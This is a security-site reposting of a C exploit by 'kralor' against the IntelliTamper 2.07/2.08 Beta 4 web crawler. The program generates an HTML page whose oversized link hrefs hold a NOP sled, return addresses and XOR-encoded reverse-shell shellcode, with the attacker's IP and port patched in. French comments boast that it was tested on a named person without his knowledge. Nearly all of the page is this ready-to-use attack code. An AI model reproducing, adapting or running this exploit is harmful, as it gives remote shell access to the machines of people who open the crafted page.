首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit 来源：www.vfcocus.net 作者：kralor 发布时间：2008-08-14   /********************************************************************/ /* [Crpt]  IntelliTamper v2.07/2.08 Beta 4 sploit by kralor  [Crpt] */ /********************************************************************/ /*                             NO MORE                              */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /********************************************************************/ /* Exploit testé sur Jef_FR a son insu, ca marche bien a 100%  :)     */ /* Jef_FR pourra vous le confirmer hihi :P                          */ /* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */ /* ben y'a du SEH alors le premier lien qui est fait plus petit     */ /* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */ /* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e  */ /* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC   */ /* j'ai remarqué que sur les deux versions une fois que ca crash    */ /* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */ /* cet offset toujours le meme (~fin de notre buffer). J'ai pas     */ /* regardé sur d'autres plateformes, vu que j'ai deja des ret       */ /* (jmp ebx) qui vont tres bien  :)  c'est tout les poulets, enjoy.   */ /*                                                                  */ /* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad   */ /* opcode du genre < > " \r \n ... C'est pas sorcier a coder  :)      */ /********************************************************************/ /* informations: www.coromputer.net, irc undernet #coromputer       */ /********************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef _WIN32 #include <winsock.h> #pragma comment(lib, "ws2_32") #else #include <arpa/inet.h> #endif #define SIZEOF   14448                 /* IntelliTamper v2.08 Beta 4 AND v2.07                                         * for v2.07 it isn't this size 'cause                                         * there's a *missing* in RET_ADDR2                                         * so it cuts the size.                                         */ #define SCOFFSET 10000                 /* IntelliTamper v2.08 Beta 4 */ #define RET_POS  SIZEOF-4 #define RET_ADDR 0x004368C4 #define SCOFFSET2 100                  /* IntelliTamper v2.07 */ #define RET_POS2  6832 #define RET_ADDR2 0x00437224 #define u_short unsigned short #define u_char  unsigned char #define HOP 0xd9 /* host opcode */ #define POP 0xda /* port opcode */ #define BEGIN "<HTML><HEAD>hi</HEAD>\r\n<BODY>\r\n" #define END   "</BODY>\r\n</HTML>" int set_sc(char *host,unsigned long port, char *sc) {   unsigned long ip,p;   unsigned int i;   ip=inet_addr(host)^0x98989898;   p=htons((u_short)port);   p=p<<16;   p+=0x0002;   p=p^0x98989898; for(i=0;i<strlen(sc);i++) {   if((u_char)sc[i]==HOP&&(u_char)sc[i+1]==HOP)     if((u_char)sc[i+2]==HOP&&(u_char)sc[i+3]==HOP) {       memcpy(sc+i,&ip,4);       ip=0;       }   if((u_char)sc[i]==POP&&(u_char)sc[i+1]==POP)     if((u_char)sc[i+2]==POP&&(u_char)sc[i+3]==POP) {       memcpy(sc+i,&p,4);       p=0;       }   } if(ip||p) {   printf("error: unable to find ip/port sequence in shellc0de\n");   return -1;   }   return 0; } void syntax(char *prog) {   printf("syntax: %s <file> <rshell_ip> <rshell_port>\n",prog);   exit(0); } void banner(void) {   printf("\n\t[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit " \          "by kralor [Crpt]\n");   printf("\t\t  www.coromputer.net && undernet #coromputer\n\n");   return; } int main(int argc, char *argv[]) {   char buffer[SIZEOF];   unsigned long port;   FILE *file;   char shellc0de[] =   /* sizeof(shellc0de+xorer) == 334 bytes */   /* classic xorer */   /* "\xcc" */   "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"   "\xb9\x3f\x01\x80\x33\x98\x43\xe2\xfa"   /* shellc0de */   "\x19\x5c\x50\x98\x98\x98\x13\x74\x13\x6c\xcd\xce\xfc\x39\xa8\x98"   "\x98\x98\x13\xd8\x94\x13\xe8\x84\x35\x13\xf0\x90\x73\x98\x13\x5d"   "\xc6\xc5\x11\x9e\x67\xae\xf0\x16\xd6\x96\x74\x70\x35\x98\x98\x98"   "\xf0\xab\xaa\x98\x98\xf0\xef\xeb\xaa\xc7\xcc\x67\x48\x13\x60\xcf"   "\xf0\x41\x91\x6d\x35\x70\x0b\x98\x98\x98\xab\x51\xc9\xc9\xc9\xc9"   "\xd9\xc9\xd9\xc9\x67\x48\x11\xde\xbc\xcf\xf0\x74\x61\x32\xf8\x70"   "\xe1\x98\x98\x98\xf0\xd9\xd9\xd9\xd9\xf0\xda\xda\xda\xda\x13\x54"   "\xf2\x88\xc9\x67\xee\xbc\x67\x48\xf0\xfb\xf5\xfc\x98\x11\xfe\xa8"   "\x67\xae\xf0\xea\x66\x2b\x8e\x70\xc9\x98\x98\x98\x11\xde\x86\x1b"   "\x74\xcc\x15\xa4\xbc\xab\x58\xab\x51\x1b\x59\x8d\x33\x7a\x65\x5e"   "\xdc\xbc\x88\xdc\x66\xdc\xbc\xa5\x66\xdc\xbc\xa4\x13\xde\xbc\x11"   "\xdc\xbc\xd0\x11\xdc\xbc\xd4\x11\xdc\xbc\xc8\x15\xdc\xbc\x88\xcc"   "\xc8\xc9\xc9\xc9\xf2\x99\xc9\xc9\x67\xee\xa8\xc9\x67\xce\x86\x67"   "\xae\xf0\x77\x56\x78\xf8\x70\x9a\x98\x98\x98\x67\x48\xcb\xcd\xce"   "\xcf\x13\xf4\xbc\x80\x13\xdd\xa4\x13\xcc\x9d\xe0\x9b\x4d\x13\xd2"   "\x80\x13\xc2\xb8\x9b\x45\x7b\xaa\xd1\x13\xac\x13\x9b\x6d\xab\x67"   "\x64\xab\x58\x34\xa2\x5c\xec\x9f\x59\x57\x95\x9b\x60\x73\x6a\xa3"   "\xe4\xbc\x8c\xed\x79\x13\xc2\xbc\x9b\x45\xfe\x13\x94\xd3\x13\xc2"   "\x84\x9b\x45\x13\x9c\x13\x9b\x5d\x73\x9a\xab\x58\x13\x4d\xc7\xc6"   "\xc5\xc3\x5a\x9c\x98";   banner();   if(argc!=4)     syntax(argv[0]);   port=atoi(argv[3]);   if(port<=0||port>65535) {     printf("error: <port> must be between 1 and 65535\r\n");     return -1;   }   printf("[S] ip: %s port: %d file: %s\r\n",argv[2],port,argv[1]);   printf("[C] Setting universal %-39s ...","shellcode");   if(set_sc(argv[2],port,shellc0de))     return -1;   printf("DONE\r\n");   file=fopen(argv[1],"w");   if(!file) {     printf("error: unable to open %s\r\n",argv[1]);     return -1;   }   printf("[C] Writing magic link for Intellitamper %-20s ...","v2.07");   fprintf(file,BEGIN);   fprintf(file,"sex drugs and rock'n'roll<BR>\r\n");   memset(buffer,0x90,sizeof(buffer));   *(unsigned long*)&buffer[RET_POS2] = RET_ADDR2;   memcpy(buffer+SCOFFSET2,shellc0de,sizeof(shellc0de)-1);   memcpy(buffer+6836-8,"\xEB\xE0",2); /* jmp $ - 0x10 */   memcpy(buffer+6836-16,"\xE9\x8F\xE5\xFF\xFF",5); /* jmp $ - ??? */   fprintf(file,"<A HREF=\"");   fprintf(file,buffer);   fprintf(file,"\">sexy bitch</A><BR>\r\n");   printf("DONE\r\n");   printf("[C] Writing magic link for Intellitamper %-20s ...","v2.08 Beta 4");   memset(buffer,0x90,sizeof(buffer));   *(unsigned long*)&buffer[RET_POS] = RET_ADDR;   memcpy(buffer+SCOFFSET,shellc0de,sizeof(shellc0de)-1);   memcpy(buffer+SIZEOF-8,"\xEB\xE0",2); /* jmp $ - 0x10 */   memcpy(buffer+SIZEOF-16,"\xE9\x8F\xEB\xFF\xFF",5); /* jmp $ - ??? */   fprintf(file,"<A HREF=\"");   fprintf(file,buffer);   fprintf(file,"\">not sexy bitch</A><BR>\r\n");   printf("DONE\r\n");   fprintf(file,END);   fclose(file);   printf("[C] All job done\r\n");   return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·>FlashGet 1.9 (FTP PWD Respons ·Microsoft Visual Studio (Msmas ·IntelliTamper 2.07 HTTP Header ·Quicksilver Forums 1.4.1 forum ·ESET Smart Security 3.0.667.0 ·Cisco WebEx Meeting Manager (a ·EO Video 1.36 Local Heap Overf ·Sun xVM VirtualBox < 1.6.4 Pri ·FlashGet 1.9.0.1012 (FTP PWD R ·BlazeDVD 5.0 PLF Playlist File ·WS_FTP Home/Professional FTP C ·Download Accelerator Plus - DA   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved